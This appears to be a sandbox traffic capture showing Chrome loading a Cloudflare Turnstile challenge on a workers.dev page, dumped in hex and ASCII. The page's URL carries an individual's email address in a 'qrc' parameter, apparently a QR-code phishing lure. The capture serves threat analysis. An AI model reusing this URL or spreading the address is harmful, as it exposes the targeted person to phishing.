2024-04-24 13:24:13 UTC	240	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:13 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 8796698d5be709f1-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:13 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	104.17.2.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:13 UTC	438	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:14 UTC	240	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:13 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 879669935c5ea984-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:14 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	104.21.52.206	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:14 UTC	674	OUT	GET /favicon.ico HTTP/1.1 Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:14 UTC	585	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:14 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 3255 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CBALoQl%2BskexfglPateRHJL%2BqI00eGLlQlvEOSw2QRhXW3I9emSxO9%2F6MmbxVCgIbb%2BQnsZKZ4qpH9M%2BrYNU3sAh8H1hc5fBb6hwhYBoL1ijqFgr7OrKoLmshjsFxxbcfTsHouPHG10vMrrr9pWmZI6IJVOfOIYmvtGSwAYzujI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 879669957c853155-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:14 UTC	784	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 Data Ascii: <!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewpor
2024-04-24 13:24:14 UTC	1369	IN	Data Raw: 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f Data Ascii: goe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-color:transparent;text-decoration:none;co
2024-04-24 13:24:14 UTC	1102	IN	Data Raw: 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 72 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: bottom:1rem}}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}@media (prefers-color-scheme:dark){body{background-colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49750	104.17.3.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:14 UTC	915	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 2803 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: a7423da5d113469 sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:14 UTC	2803	OUT	Data Raw: 76 5f 38 37 39 36 36 39 38 38 30 66 65 61 30 61 63 64 3d 32 31 71 4f 74 4f 34 4f 78 4f 57 4f 36 49 30 37 49 30 69 4f 49 52 64 4a 36 4b 49 59 30 36 30 72 77 52 4c 79 65 30 6e 66 30 71 65 59 63 55 44 30 59 65 36 76 55 59 7a 66 30 7a 54 4a 55 4a 55 41 63 6c 30 49 4a 48 30 4e 4f 59 4c 41 53 30 76 45 2d 4b 30 76 52 55 41 30 35 45 52 74 66 30 55 4f 48 30 38 49 30 66 6f 6f 76 4c 30 66 31 6c 59 6c 71 48 64 68 30 34 52 55 78 67 47 48 6c 6c 30 41 30 36 72 74 64 42 33 67 73 42 76 31 4c 6b 53 4d 30 30 4d 74 6f 6c 4d 54 46 41 74 4b 68 31 61 66 6c 30 62 33 70 4a 68 4f 30 39 30 6f 75 6b 30 36 62 36 7a 59 4a 75 36 30 55 7a 6f 6b 4b 30 66 50 5a 66 6f 64 30 30 62 45 4a 63 30 30 6c 30 7a 74 6f 6f 71 79 6f 30 32 44 38 41 30 64 5a 4c 30 66 4e 4b 38 61 38 30 56 32 33 67 65 71 Data Ascii: v_879669880fea0acd=21qOtO4OxOWO6I07I0iOIRdJ6KIY060rwRLye0nf0qeYcUD0Ye6vUYzf0zTJUJUAcl0IJH0NOYLAS0vE-K0vRUA05ERtf0UOH08I0foovL0f1lYlqHdh04RUxgGHll0A06rtdB3gsBv1LkSM00MtolMTFAtKh1afl0b3pJhO090ouk06b6zYJu60UzokK0fPZfod00bEJc00l0ztooqyo02D8A0dZL0fNK8a80V23geq
2024-04-24 13:24:14 UTC	778	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:14 GMT Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-chl-gen: sQa6QbwqhrQcQ2WvxFyEMmR2g6nTiov+NgLx3k9FcffzbFM4oy05LWIY2BqVrLWCCcfpUPGuJr/WxTAnwWseJgpCblEsb84zhZ2RcS4S9E8aQvu3gmDU0eDDEA8mbjeWT7JrbNUucIyiV/VZ17Fi5jvd4axVhZDELdZrd/S1IjqrowrcA8XfOnE5VFeaKt0jZTtLmZAVALh+owX4FNYjbQ4e/TE4TT/9wUs9TkbAPDwDPzes/V7C3DLkXflQH3FUTmgR0ETyLFspAAgIroq69+BKCQI7LaRaasxy42uNFiy5HcWXGhShtvu6RAZbms14nocCSBdBY0LCBgUx3T/AtOtn67wTn03zpjGWUy2Wvk4Q8nsfCbxCsqvpvydooI58KJbQFyWXn3V8oFTOFBsZkvlEbDSFKsMM8V1iLS+aGnmVZHPES+DmP7Jqvvr8G+HsslwHsmlXLDdRimvdnn+psq5OVvZraZYrtlVjjD/BwEQ=$5ZYY/OtYPOmKtKYkpqD2JQ== vary: accept-encoding Server: cloudflare CF-RAY: 879669946cf769e3-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:14 UTC	591	IN	Data Raw: 33 61 33 0d 0a 6a 6e 65 35 6a 5a 4f 2b 78 4c 75 43 78 4b 4b 6e 6e 4a 36 6f 78 73 53 4e 72 59 4c 4e 70 59 58 4a 6f 74 61 52 70 63 4b 76 79 4c 7a 61 32 62 32 64 79 65 48 4e 32 4f 54 45 36 4c 54 6b 34 36 69 69 35 72 7a 6c 7a 38 4b 78 30 4f 32 76 38 73 72 4b 38 65 37 31 32 38 2f 53 33 50 76 39 77 4c 57 32 2f 63 53 39 30 41 62 6a 39 51 51 4e 37 64 37 6e 44 74 44 38 36 78 4c 56 38 75 41 62 32 4d 30 58 46 75 63 4b 49 53 45 42 4a 52 49 69 49 66 6e 6b 4a 75 63 61 44 41 4c 74 44 53 73 77 48 42 4d 50 37 69 41 52 4d 41 63 38 46 77 6f 6e 45 54 55 77 2b 54 7a 39 4d 53 35 46 41 67 41 57 53 68 77 49 4f 51 6f 4f 45 41 67 78 4b 6a 49 4d 57 43 45 69 4d 68 51 62 4b 6a 49 32 53 69 6b 59 47 56 30 6c 4c 69 39 57 4e 54 4e 58 61 55 78 44 53 6b 68 45 4c 45 64 73 59 47 64 34 54 6d Data Ascii: 3a3jne5jZO+xLuCxKKnnJ6oxsSNrYLNpYXJotaRpcKvyLza2b2dyeHN2OTE6LTk46ii5rzlz8Kx0O2v8srK8e7128/S3Pv9wLW2/cS90Abj9QQN7d7nDtD86xLV8uAb2M0XFucKISEBJRIiIfnkJucaDALtDSswHBMP7iARMAc8FwonETUw+Tz9MS5FAgAWShwIOQoOEAgxKjIMWCEiMhQbKjI2SikYGV0lLi9WNTNXaUxDSkhELEdsYGd4Tm
2024-04-24 13:24:14 UTC	347	IN	Data Raw: 46 4a 5a 30 68 57 56 58 4a 65 55 6a 6c 52 59 47 4d 2b 57 58 4a 79 50 6e 4e 41 63 6f 4f 49 68 49 5a 67 66 30 78 6e 5a 35 56 54 61 31 46 34 61 70 5a 77 62 70 78 61 6d 5a 68 61 57 61 46 6b 64 35 71 68 6b 58 53 47 71 59 52 72 61 59 6d 78 5a 33 75 4d 68 71 47 71 69 59 71 74 68 58 57 4d 74 62 43 7a 71 62 36 4c 6c 63 43 2b 6e 73 69 2f 75 63 48 46 79 70 61 33 72 35 43 52 30 71 7a 47 77 70 36 51 71 70 48 62 71 4c 61 33 76 63 65 72 33 65 47 33 6e 72 50 50 31 4e 37 56 34 74 69 32 37 75 66 62 38 61 6e 44 78 4b 7a 64 36 2f 6a 78 30 4d 6e 62 75 2b 66 53 38 76 44 62 32 76 33 39 31 67 48 79 77 76 4c 6c 34 65 54 75 33 4d 6e 68 36 41 54 4b 41 50 34 4a 41 51 6e 54 44 52 50 58 38 43 44 30 41 52 34 53 42 50 41 48 47 42 38 4a 4a 68 67 4d 2b 41 38 50 4a 78 45 75 47 78 51 42 46 Data Ascii: FJZ0hWVXJeUjlRYGM+WXJyPnNAcoOIhIZgf0xnZ5VTa1F4apZwbpxamZhaWaFkd5qhkXSGqYRraYmxZ3uMhqGqiYqthXWMtbCzqb6LlcC+nsi/ucHFypa3r5CR0qzGwp6QqpHbqLa3vcer3eG3nrPP1N7V4ti27ufb8anDxKzd6/jx0Mnbu+fS8vDb2v391gHywvLl4eTu3Mnh6ATKAP4JAQnTDRPX8CD0AR4SBPAHGB8JJhgM+A8PJxEuGxQBF
2024-04-24 13:24:14 UTC	1369	IN	Data Raw: 31 31 32 33 0d 0a 77 52 58 70 47 52 6d 68 37 51 56 5a 7a 63 54 31 66 4f 57 53 44 69 6e 36 4d 65 46 6c 65 6b 59 31 68 61 46 36 49 68 6e 5a 70 62 59 4f 4c 6e 58 78 30 61 57 6d 41 67 32 4b 4d 63 61 47 41 71 61 70 38 65 5a 78 39 66 71 56 72 6e 33 35 76 67 59 6d 6a 69 4a 61 51 68 6e 53 36 74 58 65 61 72 4c 37 43 66 5a 32 54 72 72 65 58 6c 59 4b 37 6d 4b 61 69 74 34 7a 41 7a 4b 32 6b 78 49 33 4a 70 73 57 36 78 4b 6a 58 73 4b 69 53 33 75 43 64 35 65 48 50 33 64 4b 6f 32 73 72 41 79 4d 62 42 75 4b 72 49 77 63 47 31 34 4c 62 33 32 50 57 35 2b 4c 76 6d 79 50 7a 41 33 4d 4d 44 32 64 44 44 42 67 50 32 78 2f 72 31 42 77 63 4f 43 39 44 67 45 67 38 42 41 66 6a 75 2b 51 54 58 44 50 72 66 37 66 55 51 39 41 49 6b 46 78 6b 49 38 77 58 31 42 52 73 6a 43 42 33 73 45 75 6e 7a Data Ascii: 1123wRXpGRmh7QVZzcT1fOWSDin6MeFlekY1haF6IhnZpbYOLnXx0aWmAg2KMcaGAqap8eZx9fqVrn35vgYmjiJaQhnS6tXearL7CfZ2TrreXlYK7mKait4zAzK2kxI3JpsW6xKjXsKiS3uCd5eHP3dKo2srAyMbBuKrIwcG14Lb32PW5+LvmyPzA3MMD2dDDBgP2x/r1BwcOC9DgEg8BAfju+QTXDPrf7fUQ9AIkFxkI8wX1BRsjCB3sEunz
2024-04-24 13:24:14 UTC	1369	IN	Data Raw: 56 37 64 7a 78 61 55 31 4a 52 52 47 4e 63 5a 55 56 6f 69 6f 4a 32 67 31 65 4f 67 6e 43 52 54 6f 4a 6b 64 35 57 43 65 6e 74 75 6a 56 6c 7a 56 56 70 32 6e 6d 4b 53 59 35 4b 6a 6e 71 4e 6f 70 6e 56 73 64 36 79 49 6e 62 46 76 6f 4b 39 75 75 49 4b 70 6c 49 61 6c 71 35 70 32 66 70 65 37 66 34 44 43 75 33 6d 46 6b 72 75 48 6a 4d 71 49 78 70 69 6e 77 61 4c 52 79 72 4b 4e 6c 64 54 45 6b 39 44 4b 33 5a 48 4d 75 35 71 32 77 63 32 78 74 65 6e 70 79 4c 37 65 71 63 36 37 70 38 2b 71 78 74 44 43 76 2f 66 33 32 66 58 57 2f 50 48 6d 75 64 6a 79 36 2f 33 75 2b 4f 62 63 2b 76 6a 72 33 63 4d 46 39 2b 4c 73 43 66 73 44 43 77 51 4d 7a 2f 6a 56 42 42 49 4b 38 50 76 58 46 67 48 69 32 52 41 50 37 77 51 67 48 52 59 56 4a 76 59 58 2b 78 6b 67 46 41 6a 75 42 69 77 6c 38 53 55 6b 45 Data Ascii: V7dzxaU1JRRGNcZUVoioJ2g1eOgnCRToJkd5WCentujVlzVVp2nmKSY5KjnqNopnVsd6yInbFvoK9uuIKplIalq5p2fpe7f4DCu3mFkruHjMqIxpinwaLRyrKNldTEk9DK3ZHMu5q2wc2xtenpyL7eqc67p8+qxtDCv/f32fXW/PHmudjy6/3u+Obc+vjr3cMF9+LsCfsDCwQMz/jVBBIK8PvXFgHi2RAP7wQgHRYVJvYX+xkgFAjuBiwl8SUkE
2024-04-24 13:24:14 UTC	1369	IN	Data Raw: 36 63 56 56 54 52 6e 64 48 52 6f 64 6b 65 59 6c 4c 6b 58 47 41 67 32 4f 4d 67 59 79 4c 62 57 31 56 6c 6d 6c 39 6e 58 4b 69 6c 4a 6c 2b 63 59 4e 77 66 6f 52 70 6f 6e 35 36 59 49 6d 4a 6f 36 2b 78 72 6e 2b 49 68 4c 53 75 64 70 71 62 71 6e 5a 78 69 70 36 71 6b 34 43 69 6a 36 4b 53 76 4d 6d 59 6d 49 79 33 6e 71 2b 61 6f 70 47 6f 6f 4a 62 44 70 61 72 53 6c 4a 4b 37 30 4e 4f 71 77 75 50 41 30 37 50 68 6d 64 76 52 78 63 66 44 36 4e 6e 44 75 73 33 54 35 74 58 52 31 2b 6a 59 31 38 50 4b 31 38 76 50 37 74 76 4f 30 74 50 67 39 2b 66 57 36 4f 55 4b 32 75 7a 61 35 2f 37 72 33 66 50 69 79 67 54 4f 39 51 6e 76 36 2f 59 4f 48 2f 44 74 45 68 4c 76 47 75 49 46 2b 76 6a 33 35 41 44 6a 47 41 49 50 47 67 73 69 44 78 45 6f 4a 2f 41 74 4e 66 4d 50 38 67 59 38 39 42 45 62 46 42 Data Ascii: 6cVVTRndHRodkeYlLkXGAg2OMgYyLbW1Vlml9nXKilJl+cYNwfoRpon56YImJo6+xrn+IhLSudpqbqnZxip6qk4Cij6KSvMmYmIy3nq+aopGooJbDparSlJK70NOqwuPA07PhmdvRxcfD6NnDus3T5tXR1+jY18PK18vP7tvO0tPg9+fW6OUK2uza5/7r3fPiygTO9Qnv6/YOH/DtEhLvGuIF+vj35ADjGAIPGgsiDxEoJ/AtNfMP8gY89BEbFB
2024-04-24 13:24:14 UTC	288	IN	Data Raw: 63 33 39 6b 68 6c 68 6c 52 6d 5a 61 53 34 52 52 63 34 56 78 69 30 79 4f 6a 46 6c 30 66 57 6c 32 62 35 35 2b 58 57 39 2f 6b 71 4f 49 66 6f 69 74 67 6d 6c 73 70 6f 6c 74 68 35 36 4e 63 59 75 4d 6b 58 57 4f 65 35 56 35 6b 71 39 36 78 49 36 50 6f 4a 4b 79 6f 61 62 45 6a 4d 72 44 78 59 4c 50 72 61 69 2b 31 61 62 44 77 72 47 77 74 73 32 59 74 61 6a 4c 76 61 33 64 30 4a 2f 66 78 72 75 6f 78 2b 50 6b 77 63 69 72 37 65 79 6b 7a 63 33 6f 77 4d 69 79 2b 63 7a 49 2b 50 6d 35 38 37 4c 70 37 73 33 44 30 63 4c 41 78 74 58 64 44 4d 7a 56 33 52 44 4f 36 66 49 50 2f 63 34 4b 43 77 62 73 46 64 72 6c 42 67 72 6f 33 68 76 65 48 64 59 44 45 64 38 64 46 79 72 64 47 51 6a 6d 41 77 34 61 2f 51 49 32 4e 68 55 4c 4b 2f 55 62 43 50 4d 63 39 68 4d 64 44 77 78 45 52 43 5a 43 49 78 67 Data Ascii: c39khlhlRmZaS4RRc4Vxi0yOjFl0fWl2b55+XW9/kqOIfoitgmlspolth56NcYuMkXWOe5V5kq96xI6PoJKyoabEjMrDxYLPrai+1abDwrGwts2YtajLva3d0J/fxruox+Pkwcir7eykzc3owMiy+czI+Pm587Lp7s3D0cLAxtXdDMzV3RDO6fIP/c4KCwbsFdrlBgro3hveHdYDEd8dFyrdGQjmAw4a/QI2NhULK/UbCPMc9hMdDwxERCZCIxg
2024-04-24 13:24:14 UTC	345	IN	Data Raw: 31 35 32 0d 0a 39 62 48 6a 78 69 59 57 59 38 4f 6a 59 6a 52 45 6f 37 50 45 68 52 4b 30 56 47 55 30 64 58 53 6e 68 32 54 47 5a 4a 53 7a 74 75 58 57 45 2f 62 6f 5a 57 65 48 74 45 53 59 78 35 52 57 52 65 61 49 46 6f 59 6d 4b 56 6b 57 4a 6e 69 57 39 75 62 5a 35 7a 61 6d 39 63 67 70 53 56 58 48 79 47 65 57 46 2f 71 6c 35 32 5a 70 2b 68 62 4b 56 2b 73 49 79 49 74 34 47 77 73 72 53 30 73 5a 75 6f 6b 71 4a 39 67 72 69 5a 74 6f 4b 6f 68 71 72 48 6f 71 62 43 69 49 66 47 6e 37 37 46 74 61 76 46 73 36 69 6f 75 4a 57 78 6d 63 75 37 34 63 47 2b 33 74 6a 55 78 74 2f 59 33 4e 7a 57 33 73 54 4b 79 76 4c 48 34 4f 54 75 38 74 4c 69 73 4f 50 53 36 72 58 70 39 50 49 44 31 65 50 58 42 38 58 33 2f 50 66 62 43 4d 6a 37 79 38 63 53 34 75 76 4a 46 74 49 49 39 65 41 54 39 52 62 62 Data Ascii: 1529bHjxiYWY8OjYjREo7PEhRK0VGU0dXSnh2TGZJSztuXWE/boZWeHtESYx5RWReaIFoYmKVkWJniW9ubZ5zam9cgpSVXHyGeWF/ql52Zp+hbKV+sIyIt4GwsrS0sZuokqJ9griZtoKohqrHoqbCiIfGn77FtavFs6iouJWxmcu74cG+3tjUxt/Y3NzW3sTKyvLH4OTu8tLisOPS6rXp9PID1ePXB8X3/PfbCMj7y8cS4uvJFtII9eAT9Rbb
2024-04-24 13:24:14 UTC	346	IN	Data Raw: 31 35 33 0d 0a 53 46 59 32 58 6b 77 35 4d 6c 5a 4a 50 69 46 69 56 54 39 4f 4a 32 39 6f 59 47 51 77 52 30 74 46 62 45 70 75 58 47 31 33 62 57 74 31 65 48 64 5a 59 56 56 67 66 32 68 64 66 32 42 65 65 6f 52 67 58 6f 47 48 62 6d 2b 4a 69 56 4f 56 6b 34 32 58 68 5a 56 72 6b 4a 46 39 6e 34 4b 41 62 32 35 66 5a 59 68 31 65 59 43 63 65 59 68 34 67 47 36 6e 71 72 4b 49 69 71 36 58 62 4c 79 36 68 37 58 41 66 72 2b 2f 66 4d 47 42 6f 38 69 6d 71 6f 43 61 69 49 69 68 71 38 75 72 79 4b 65 39 71 34 2b 50 74 71 47 55 70 70 65 64 74 63 6d 53 7a 2b 48 52 6f 70 37 50 34 4b 65 6d 73 39 37 74 33 61 37 66 71 72 79 71 37 2b 61 2f 7a 65 6e 75 73 4f 4c 62 38 4e 7a 78 2b 77 48 4f 76 72 55 42 37 38 4c 6a 36 64 73 43 2b 66 6a 33 78 74 37 75 37 41 59 4c 42 51 41 4a 45 4f 45 43 38 65 Data Ascii: 153SFY2Xkw5MlZJPiFiVT9OJ29oYGQwR0tFbEpuXG13bWt1eHdZYVVgf2hdf2BeeoRgXoGHbm+JiVOVk42XhZVrkJF9n4KAb25fZYh1eYCceYh4gG6nqrKIiq6XbLy6h7XAfr+/fMGBo8imqoCaiIihq8uryKe9q4+PtqGUppedtcmSz+HRop7P4Kems97t3a7fqryq7+a/zenusOLb8Nzx+wHOvrUB78Lj6dsC+fj3xt7u7AYLBQAJEOEC8e
2024-04-24 13:24:14 UTC	175	IN	Data Raw: 61 39 0d 0a 61 50 6a 5a 4d 53 30 46 50 59 32 5a 47 58 6a 74 72 61 44 55 35 53 47 46 4a 55 79 74 31 51 45 4e 66 59 47 31 79 65 55 52 53 54 58 42 4a 61 6d 4e 54 64 58 4d 39 52 6e 56 66 69 47 52 34 53 49 68 6d 61 6f 42 65 61 6f 56 4e 58 32 31 34 62 6d 6d 4b 6d 34 5a 39 63 33 52 2b 6d 35 74 68 70 6d 36 6d 6b 4a 65 4a 66 71 61 4b 6f 35 32 41 6e 6e 36 63 61 34 53 76 6f 37 4f 6a 74 37 71 61 76 6f 61 37 71 58 35 38 75 35 69 64 6b 61 43 2b 78 36 75 44 7a 5a 57 46 6d 70 2f 4b 6f 6f 6d 65 78 4a 36 51 78 4b 32 79 78 36 79 30 0d 0a Data Ascii: a9aPjZMS0FPY2ZGXjtraDU5SGFJUyt1QENfYG1yeURSTXBJamNTdXM9RnVfiGR4SIhmaoBeaoVNX214bmmKm4Z9c3R+m5thpm6mkJeJfqaKo52Ann6ca4Svo7Ojt7qavoa7qX58u5idkaC+x6uDzZWFmp/KoomexJ6QxK2yx6y0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	104.17.3.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:18 UTC	915	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 2803 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: a7423da5d113469 sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:18 UTC	2803	OUT	Data Raw: 76 5f 38 37 39 36 36 39 38 38 30 66 65 61 30 61 63 64 3d 32 31 71 4f 74 4f 34 4f 78 4f 57 4f 36 49 30 37 49 30 69 4f 49 52 64 4a 36 4b 49 59 30 36 30 72 77 52 4c 79 65 30 6e 66 30 71 65 59 63 55 44 30 59 65 36 76 55 59 7a 66 30 7a 54 4a 55 4a 55 41 63 6c 30 49 4a 48 30 4e 4f 59 4c 41 53 30 76 45 2d 4b 30 76 52 55 41 30 35 45 52 74 66 30 55 4f 48 30 38 49 30 66 6f 6f 76 4c 30 66 31 6c 59 6c 71 48 64 68 30 34 52 55 78 67 47 48 6c 6c 30 41 30 36 72 74 64 42 33 67 73 42 76 31 4c 6b 53 4d 30 30 4d 74 6f 6c 4d 54 46 41 74 4b 68 31 61 66 6c 30 62 33 70 4a 68 4f 30 39 30 6f 75 6b 30 36 62 36 7a 59 4a 75 36 30 55 7a 6f 6b 4b 30 66 50 5a 66 